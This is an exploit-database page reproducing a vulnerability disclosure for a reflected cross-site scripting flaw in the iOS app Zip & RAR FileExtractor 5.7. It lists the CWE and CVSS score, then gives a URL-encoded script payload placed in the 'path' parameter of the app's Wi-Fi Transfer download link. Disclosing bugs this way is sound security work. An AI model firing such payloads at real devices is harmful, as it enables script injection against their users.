Advertisement






Zip And RAR FileExtractor 5.7 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2023-06-30
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023060074

Below is a copy:

Zip And RAR FileExtractor 5.7 Cross Site Scripting
# Exploit Title: Zip & RAR FileExtractor  v5.7 - Reflected XSS
# Vendor Homepage: Penghui Zhao
# Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en
# Date: 2023-06-20
# Exploit Author: tmrswrr
# Category : ios app
# Version: v5.7
# Tested on: Windows/Linux


## Description:

>> Go to Wi-Fi Transfer section in zip rar file extractor app
>> It will be create link : 192.168.1.104:8080
>> When open link your browser , write payload, xss payload execute page and see alert button

Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E
Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.